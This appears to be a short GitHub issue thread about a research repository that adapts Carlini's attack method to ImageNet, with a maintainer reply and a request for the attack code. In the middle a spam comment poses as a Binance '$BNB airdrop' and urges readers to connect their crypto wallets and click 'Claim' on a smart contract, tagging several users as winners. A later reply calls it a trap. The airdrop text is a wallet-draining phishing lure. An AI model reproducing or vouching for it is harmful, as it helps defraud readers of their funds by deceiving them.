Open dong-0412 opened 1 year ago
Thanks for asking. Please refer to the newly updated README.md.
To clarify, we just follow the idea of Carlini's paper. The dataset (we use Imagenet), prompts, attack targets are actually different.
$BNB Airdrop: Claim Your $1000 in BNB Now!
🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!
Steps to Claim:
1. 🌐 Connect Your Binance Wallet:
- Click on the Connect Wallet link.
- Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
2. 🔄 Interact with the Contract:
- Once your wallet is connected.
- Click on the "Claim" button to interact with the smart contract.
💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!
Winners: @maamalama, @Jennal, @weekitmo, @fgky, @genchik1, @asimonDLT, @ArkTarusov
This is a trap, fake website.
You mentioned that you have replicated Carlini's attack method, can you post the exact code?